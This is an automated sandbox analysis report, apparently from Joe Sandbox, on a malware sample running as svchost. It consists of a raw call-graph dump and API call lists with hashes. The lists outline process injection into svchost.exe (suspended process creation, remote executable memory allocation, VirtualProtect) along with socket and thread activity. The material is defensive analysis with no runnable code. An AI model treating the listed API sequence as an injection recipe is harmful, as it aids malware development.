40186c9 18159 401fea0 __VEC_memcpy 18180 40185bd codecvt 18159->18180 18161 4017df5 18162 4017e18 18161->18162 18163 4017f4c 18161->18163 18183 4017d5a 18161->18183 18167 4017e37 18162->18167 18168 4017e96 18162->18168 18162->18183 18165 4017fd3 18163->18165 18166 4017f58 18163->18166 18169 40194d0 __VEC_memcpy 18165->18169 18174 4017f93 18166->18174 18175 401fea0 __VEC_memcpy 18166->18175 18166->18183 18171 4017e5e 18167->18171 18196 401fea0 18167->18196 18206 40194d0 18168->18206 18172 4017ffb 18169->18172 18200 40195c0 18171->18200 18181 401fea0 __VEC_memcpy 18172->18181 18172->18183 18176 40195c0 __VEC_memcpy 18174->18176 18175->18174 18176->18183 18180->18158 18182 4006410 __VEC_memcpy 18180->18182 18181->18183 18182->18158 18183->18158 18183->18159 18183->18180 18184 4017350 __VEC_memcpy 18184->18186 18185 401fea0 __VEC_memcpy 18185->18183 18186->18161 18186->18183 18186->18184 18187 401844f 18186->18187 18190 4017b40 __VEC_memcpy 18186->18190 18192 401ee80 18186->18192 18210 40060a0 18186->18210 18222 4024600 18186->18222 18226 4017350 18187->18226 18190->18186 18194 401ee8d _strlen 18192->18194 18193 401eea2 18193->18186 18194->18193 18195 4006ca0 _realloc __VEC_memcpy 18194->18195 18195->18194 18197 401fecb _vwprintf 18196->18197 18198 401f9f0 __VEC_memcpy 18197->18198 18199 4020002 codecvt __crtGetStringTypeA_stat 18198->18199 18199->18171 18201 40195da 18200->18201 18205 4019658 18200->18205 18202 401962d 18201->18202 18201->18205 18238 401a600 18201->18238 18204 4006410 __VEC_memcpy 18202->18204 18204->18205 18205->18183 18207 40194e0 18206->18207 18208 4017ebf 18207->18208 18209 4006ca0 _realloc __VEC_memcpy 18207->18209 18208->18183 18208->18185 18209->18207 18211 40060b0 18210->18211 18212 401efb0 __VEC_memcpy 18211->18212 18213 40060e1 18212->18213 18214 401efb0 __VEC_memcpy 18213->18214 18215 40060f5 18214->18215 18216 401efb0 __VEC_memcpy 18215->18216 18217 400610a 18216->18217 18218 401efb0 __VEC_memcpy 18217->18218 18219 400611f 18218->18219 18220 401f620 __VEC_memcpy 18219->18220 18221 4006133 18220->18221 18221->18186 18223 402460d 18222->18223 18224 4024619 18223->18224 18225 4015c60 __VEC_memcpy 18223->18225 18224->18186 18225->18223 18228 4017360 18226->18228 18227 401736b 18227->18183 18231 4017b40 18227->18231 18228->18227 18230 401f9f0 __VEC_memcpy 18228->18230 18241 4020440 18228->18241 18230->18228 18235 4017b50 _memset codecvt 18231->18235 18232 4017b5b 18232->18183 18234 401f9f0 __VEC_memcpy 18234->18235 18235->18232 18235->18234 18237 401fc90 __VEC_memcpy 18235->18237 18245 40205e0 18235->18245 18249 4017230 18235->18249 18237->18235 18239 401efb0 __VEC_memcpy 18238->18239 18240 401a642 _strlen 18239->18240 18240->18202 18242 4020450 _memset codecvt 18241->18242 18243 4006ca0 _realloc __VEC_memcpy 18242->18243 18244 4020462 codecvt 18242->18244 18243->18242 18244->18228 18247 40205f0 codecvt 18245->18247 18246 4020608 18246->18235 18247->18246 18248 4006ca0 _realloc __VEC_memcpy 18247->18248 18248->18247 18252 4017240 _memset codecvt 18249->18252 18250 401e8c0 __VEC_memcpy 18250->18252 18251 401724c 18251->18235 18252->18250 18252->18251 18810 4018f70 18813 4018f7a codecvt 18810->18813 18812 4018faa 18813->18812 18814 401c930 18813->18814 18818 401c940 codecvt 18814->18818 18816 401c97a 18816->18813 18817 4023590 __VEC_memcpy 18817->18818 18818->18816 18818->18817 18819 4028060 __VEC_memcpy 18818->18819 18821 40267c0 18818->18821 18827 4024050 18818->18827 18819->18818 18823 40267cd _memset codecvt 18821->18823 18822 40255a0 __VEC_memcpy 18822->18823 18823->18822 18824 4024ae0 __VEC_memcpy 18823->18824 18825 40255c0 __VEC_memcpy 18823->18825 18826 40267df 18823->18826 18824->18823 18825->18823 18826->18818 18828 4024067 18827->18828 18829 402407f 18828->18829 18833 40245b0 18828->18833 18837 4024aa0 18829->18837 18835 40245c9 18833->18835 18834 40245e1 18834->18829 18835->18834 18840 4014fd0 18835->18840 18852 4024820 18837->18852 18841 4014ff2 18840->18841 18844 4014ae0 18841->18844 18843 4015075 18843->18834 18851 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 18844->18851 18845 4014ea7 __crtGetStringTypeA_stat 18845->18843 18846 401e730 __VEC_memcpy 18846->18851 18847 401efb0 __VEC_memcpy 18847->18851 18848 401f9f0 __VEC_memcpy 18848->18851 18849 401ebc0 __VEC_memcpy 18849->18851 18850 4020050 __VEC_memcpy 18850->18851 18851->18845 18851->18846 18851->18847 18851->18848 18851->18849 18851->18850 18855 4024830 codecvt std::_Iterator_base::_Iterator_base _strlen 18852->18855 18853 402409f 18853->18818 18854 401fc90 __VEC_memcpy 18854->18855 18855->18853 18855->18854 18856 4015c60 __VEC_memcpy 18855->18856 18861 40246a0 18855->18861 18866 40242c0 18855->18866 18874 40243f0 18855->18874 18882 4024180 18855->18882 18856->18855 18863 40246ba codecvt std::_Iterator_base::_Iterator_base _strlen 18861->18863 18862 40246de __crtGetStringTypeA_stat 18862->18855 18863->18862 18864 401fc90 __VEC_memcpy 18863->18864 18865 4015c60 __VEC_memcpy 18863->18865 18864->18863 18865->18863 18867 4024330 18866->18867 18868 4006ca0 _realloc __VEC_memcpy 18867->18868 18869 40243a0 18868->18869 18870 4006ca0 _realloc __VEC_memcpy 18869->18870 18871 40243b7 18870->18871 18872 4006ca0 _realloc __VEC_memcpy 18871->18872 18873 40243d0 __crtGetStringTypeA_stat 18872->18873 18873->18855 18875 4024460 18874->18875 18876 4006ca0 _realloc __VEC_memcpy 18875->18876 18877 40244d0 18876->18877 18878 4006ca0 _realloc __VEC_memcpy 18877->18878 18879 40244e7 18878->18879 18880 4006ca0 _realloc __VEC_memcpy 18879->18880 18881 4024500 __crtGetStringTypeA_stat 18880->18881 18881->18855 18883 4024200 18882->18883 18884 4006ca0 _realloc __VEC_memcpy 18883->18884 18885 4024270 18884->18885 18886 4006ca0 _realloc __VEC_memcpy 18885->18886 18887 4024287 18886->18887 18888 4006ca0 _realloc __VEC_memcpy 18887->18888 18889 40242a0 __crtGetStringTypeA_stat 18888->18889 18889->18855 18116 4023270 18119 4023276 codecvt 18116->18119 18117 402327c codecvt 18119->18117 18121 401f9f0 __VEC_memcpy 18119->18121 18122 4022b80 18119->18122 18126 401f8b0 18119->18126 18121->18119 18123 402305c codecvt __crtGetStringTypeA_stat 18122->18123 18124 4022bb5 _memset codecvt 18122->18124 18123->18119 18124->18123 18125 4006ca0 _realloc __VEC_memcpy 18124->18125 18125->18124 18129 401f8bd codecvt 18126->18129 18127 401f8cf 18127->18119 18128 4006ca0 __VEC_memcpy _realloc 18128->18129 18129->18127 18129->18128 18492 4008cf2 18493 4008cfe 6 library calls 18492->18493 18500 400c4a5 18493->18500 18495 4008dac __setargv __amsg_exit __setenvp 18504 4009a9d 18495->18504 18497 4008dd9 __wincmdln __amsg_exit 18508 40210d0 18497->18508 18499 4008e05 __close 18501 400c4c3 __malloc_crt 18500->18501 18502 4006ca0 _realloc __VEC_memcpy 18501->18502 18503 400c4cb __crtGetStringTypeA_stat __malloc_crt 18501->18503 18502->18503 18503->18495 18505 4009aab __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 18504->18505 18507 4009ae8 __IsNonwritableInCurrentImage __initterm 18505->18507 18516 4007252 18505->18516 18507->18497 18510 40210e8 18508->18510 18537 4020e40 18510->18537 18511 402114a 18542 4021a50 18511->18542 18514 4021154 18515 40213ad codecvt __crtGetStringTypeA_stat 18514->18515 18546 4019020 18514->18546 18515->18499 18519 4007216 18516->18519 18518 400725f 18518->18507 18520 4007222 __cinit __close 18519->18520 18523 400712b 18520->18523 18522 4007233 __cinit __close 18522->18518 18524 400713f __decode_pointer __msize 18523->18524 18525 40071a7 __encode_pointer 18524->18525 18526 4007191 18524->18526 18529 40098bd 18524->18529 18525->18522 18526->18525 18528 40098bd __realloc_crt __VEC_memcpy 18526->18528 18528->18525 18532 40098c6 18529->18532 18531 4009905 18531->18526 18532->18531 18533 400d4ce 18532->18533 18535 400d4da 7 library calls 18533->18535 18534 400d4e1 __close _realloc _malloc __fileno __crtGetStringTypeA_stat 18534->18532 18535->18534 18536 4006ca0 __VEC_memcpy _realloc 18535->18536 18536->18535 18540 4020e54 _strlen 18537->18540 18539 4020e7b codecvt 18539->18511 18540->18539 18541 4006ca0 __VEC_memcpy _realloc 18540->18541 18552 4021d30 18540->18552 18541->18540 18544 4021a6a _memset codecvt 18542->18544 18545 4021cf4 __crtGetStringTypeA_stat 18544->18545 18558 4021460 18544->18558 18545->18514 18550 4019030 codecvt 18546->18550 18547 401903b 18547->18514 18548 4023970 __VEC_memcpy 18548->18550 18549 4017410 __VEC_memcpy 18549->18550 18550->18547 18550->18548 18550->18549 18551 4016980 __VEC_memcpy 18550->18551 18551->18550 18553 4021f18 codecvt 18552->18553 18557 4021d4b _memset 18552->18557 18553->18540 18554 4006ca0 __VEC_memcpy _realloc 18554->18557 18555 4006ca0 _realloc __VEC_memcpy 18555->18553 18556 4021efd 18556->18553 18556->18555 18557->18553 18557->18554 18557->18556 18560 4021477 _memset 18558->18560 18559 4021489 __crtGetStringTypeA_stat 18559->18544 18560->18559 18561 4006ca0 _realloc __VEC_memcpy 18560->18561 18561->18560 18714 4028130 18715 402813f 18714->18715 18716 4007252 __cinit __VEC_memcpy 18715->18716 18717 4028149 18716->18717 18986 40233f0 18988 40233f6 codecvt 18986->18988 18987 40233fc 18988->18987 18989 401f620 __VEC_memcpy 18988->18989 18991 4026c40 18988->18991 18989->18988 18994 4026c7b codecvt std::_Iterator_base::_Iterator_base 18991->18994 18992 401f9f0 __VEC_memcpy 18992->18994 18993 4026cb6 codecvt __crtGetStringTypeA_stat 18993->18988 18994->18992 18994->18993 18996 4022700 18994->18996 18997 4022717 18996->18997 18999 40227e6 codecvt 18996->18999 18998 4006ca0 _realloc __VEC_memcpy 18997->18998 18997->18999 18998->18999 18999->18994 18253 40014b3 18255 40014c2 18253->18255 18254 400161a 18255->18254 18256 4001430 QueryPerformanceCounter 18255->18256 18257 4001514 18256->18257 18258 4001430 QueryPerformanceCounter 18257->18258 18259 4001524 18258->18259 18260 4001160 7 API calls 18259->18260 18261 4001549 18260->18261 18262 400160d Sleep 18261->18262 18263 400155f 18261->18263 18262->18254 18264 40013b0 2 API calls 18263->18264 18265 4001572 lstrcat GetTickCount 18264->18265 18266 40010e0 2 API calls 18265->18266 18267 40015ad 18266->18267 18268 4001040 2 API calls 18267->18268 18269 40015ea closesocket 18268->18269 18269->18254 18562 40016f4 18566 400166f 18562->18566 18563 400167c WaitForSingleObject 18564 40016a3 GetExitCodeProcess 18563->18564 18565 400168f TerminateProcess 18563->18565 18564->18566 18571 4001735 18565->18571 18566->18563 18567 40016cc Sleep 18566->18567 18568 40016e5 SetEvent 18566->18568 18569 40016f6 CloseHandle Sleep 18566->18569 18566->18571 18572 4001dc0 8 API calls 18566->18572 18567->18566 18568->18571 18570 40023e0 32 API calls 18569->18570 18570->18566 18572->18566 18130 401b077 18133 401affe 18130->18133 18131 401b015 codecvt 18132 401b083 18136 401cd80 18132->18136 18133->18131 18133->18132 18140 401a890 18133->18140 18139 401cd90 codecvt 18136->18139 18137 401cda8 18137->18131 18138 4006ca0 _realloc __VEC_memcpy 18138->18139 18139->18137 18139->18138 18143 401a8b7 _memset codecvt _strnlen _strlen 18140->18143 18141 401a8cf codecvt __crtGetStringTypeA_stat 18141->18133 18142 4006ca0 _realloc __VEC_memcpy 18142->18143 18143->18141 18143->18142 18145 401d100 18143->18145 18148 401d128 _memset 18145->18148 18146 401d142 codecvt __crtGetStringTypeA_stat 18146->18143 18147 4006ca0 __VEC_memcpy _realloc 18147->18148 18148->18146 18148->18147 18149 4006410 __VEC_memcpy 18148->18149 18149->18148 18270 40190bd 18273 4019030 codecvt 18270->18273 18275 401903b 18273->18275 18276 4017410 18273->18276 18280 4016980 18273->18280 18284 4023970 18273->18284 18278 401742d 18276->18278 18279 401753f _memset 18278->18279 18300 4004d10 18278->18300 18279->18273 18281 4016987 18280->18281 18282 401698d 18281->18282 18283 4006410 __VEC_memcpy 18281->18283 18282->18273 18283->18281 18286 4023980 18284->18286 18285 401efb0 __VEC_memcpy 18287 40239f5 18285->18287 18286->18285 18288 4006ca0 _realloc __VEC_memcpy 18287->18288 18289 4023a6a 18288->18289 18304 40048c0 18289->18304 18291 4023ab4 18293 4023b21 18291->18293 18322 4004600 18291->18322 18295 4023b88 18293->18295 18332 40044b0 18293->18332 18297 4023bef 18295->18297 18338 4004b60 18295->18338 18298 4023c56 18297->18298 18299 4004d10 __VEC_memcpy 18297->18299 18298->18273 18299->18297 18301 4004d20 18300->18301 18302 401efb0 __VEC_memcpy 18301->18302 18303 4004d74 18302->18303 18303->18278 18305 40048d0 18304->18305 18348 401ef30 18305->18348 18308 401efb0 __VEC_memcpy 18309 4004921 18308->18309 18310 401efb0 __VEC_memcpy 18309->18310 18311 400494e 18310->18311 18312 401efb0 __VEC_memcpy 18311->18312 18313 4004963 18312->18313 18314 401efb0 __VEC_memcpy 18313->18314 18315 4004978 18314->18315 18316 401efb0 __VEC_memcpy 18315->18316 18317 400498d 18316->18317 18318 401efb0 __VEC_memcpy 18317->18318 18319 40049a2 18318->18319 18320 401efb0 __VEC_memcpy 18319->18320 18321 40049c3 18320->18321 18321->18291 18323 4004610 18322->18323 18324 401efb0 __VEC_memcpy 18323->18324 18325 400464c 18324->18325 18326 401efb0 __VEC_memcpy 18325->18326 18327 4004661 18326->18327 18328 401efb0 __VEC_memcpy 18327->18328 18329 4004676 18328->18329 18330 4006ca0 _realloc __VEC_memcpy 18329->18330 18331 40046b4 18330->18331 18331->18291 18333 40044c0 18332->18333 18334 401efb0 __VEC_memcpy 18333->18334 18335 40044fc 18334->18335 18336 401efb0 __VEC_memcpy 18335->18336 18337 4004535 18336->18337 18337->18293 18339 4004b70 18338->18339 18340 401efb0 __VEC_memcpy 18339->18340 18341 4004bac 18340->18341 18342 401efb0 __VEC_memcpy 18341->18342 18343 4004bc1 18342->18343 18344 401efb0 __VEC_memcpy 18343->18344 18347 4004bd6 18344->18347 18345 4004c53 18345->18295 18346 401efb0 __VEC_memcpy 18346->18347 18347->18345 18347->18346 18350 401ef3d 18348->18350 18349 400490c 18349->18308 18350->18349 18351 4006ca0 _realloc __VEC_memcpy 18350->18351 18351->18350

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 04002122
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                • API String ID: 1819736980-1559310322
                                                                                                                                                                                • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$Alloc$Free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3668210933-0
                                                                                                                                                                                • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 132 401005-40107e LoadLibraryExA GetProcAddress call 401126 137 401083-401099 GetPEB 132->137
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                • GetProcAddress.KERNEL32(76B10000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                  • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.675966025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_400000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                • API String ID: 4074058790-1482053243
                                                                                                                                                                                • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 161 408bf20-408bf2d 162 408bf3a-408bf3f 161->162 163 408bf41 162->163 164 408bf30-408bf35 163->164 165 408bf43 163->165 167 408bf36-408bf38 164->167 166 408bf48-408bf4a 165->166 168 408bf4c-408bf51 166->168 169 408bf53-408bf57 166->169 167->162 167->163 168->169 170 408bf59 169->170 171 408bf64-408bf67 169->171 172 408bf5b-408bf62 170->172 173 408bf83-408bf88 170->173 174 408bf69-408bf6e 171->174 175 408bf70-408bf72 171->175 172->171 172->173 176 408bf8a-408bf93 173->176 177 408bf9b-408bf9d 173->177 174->175 175->166 180 408c00a-408c00d 176->180 181 408bf95-408bf99 176->181 178 408bf9f-408bfa4 177->178 179 408bfa6 177->179 178->179 183 408bfa8-408bfab 179->183 184 408bf74-408bf76 179->184 182 408c012-408c015 180->182 181->179 185 408c017-408c019 182->185 186 408bfad-408bfb2 183->186 187 408bfb4 183->187 188 408bf78-408bf7d 184->188 189 408bf7f-408bf81 184->189 185->182 190 408c01b-408c01e 185->190 186->187 187->184 191 408bfb6-408bfb8 187->191 188->189 192 408bfd5-408bfe4 189->192 190->182 193 408c020-408c03c 190->193 194 408bfba-408bfbf 191->194 195 408bfc1-408bfc5 191->195 196 408bff4-408c001 192->196 197 408bfe6-408bfed 192->197 193->185 198 408c03e 193->198 194->195 195->191 199 408bfc7 195->199 196->196 201 408c003-408c005 196->201 197->197 200 408bfef 197->200 202 408c044-408c048 198->202 203 408bfc9-408bfd0 199->203 204 408bfd2 199->204 200->167 201->167 205 408c04a-408c060 LoadLibraryA 202->205 206 408c08f-408c092 202->206 203->191 203->204 204->192 207 408c061-408c066 205->207 208 408c095-408c09c 206->208 207->202 211 408c068-408c06a 207->211 209 408c09e-408c0a0 208->209 210 408c0c0-408c0f0 VirtualProtect * 2 208->210 212 408c0a2-408c0b1 209->212 213 408c0b3-408c0be 209->213 214 408c0f4-408c0f8 210->214 215 408c06c-408c072 211->215 216 408c073-408c080 GetProcAddress 211->216 212->208 213->212 214->214 217 408c0fa 214->217 215->216 218 408c089 ExitProcess 216->218 219 408c082-408c087 216->219 219->207
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1996367037-0
                                                                                                                                                                                • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                  • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                  • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                  • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1305884959-0
                                                                                                                                                                                • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 93 4001630-400163a 94 4001640-4001662 CoInitialize 93->94 95 400176c-4001771 93->95 96 4001766 94->96 97 4001668 94->97 96->95 98 400166f-4001676 97->98 98->96 99 400167c-400168d WaitForSingleObject 98->99 100 40016a3-40016bd GetExitCodeProcess 99->100 101 400168f-400169e TerminateProcess 99->101 102 4001761 100->102 103 40016c3-40016ca 100->103 101->96 102->98 104 40016dc-40016e3 103->104 105 40016cc-40016d7 Sleep 103->105 106 40016e5-40016f2 SetEvent 104->106 107 40016f6-4001733 CloseHandle Sleep call 40023e0 104->107 105->102 106->96 110 4001735 107->110 111 4001739-4001749 107->111 110->96 111->102 112 400174b-400175e call 4001dc0 111->112 112->102
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 110750051-0
                                                                                                                                                                                • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
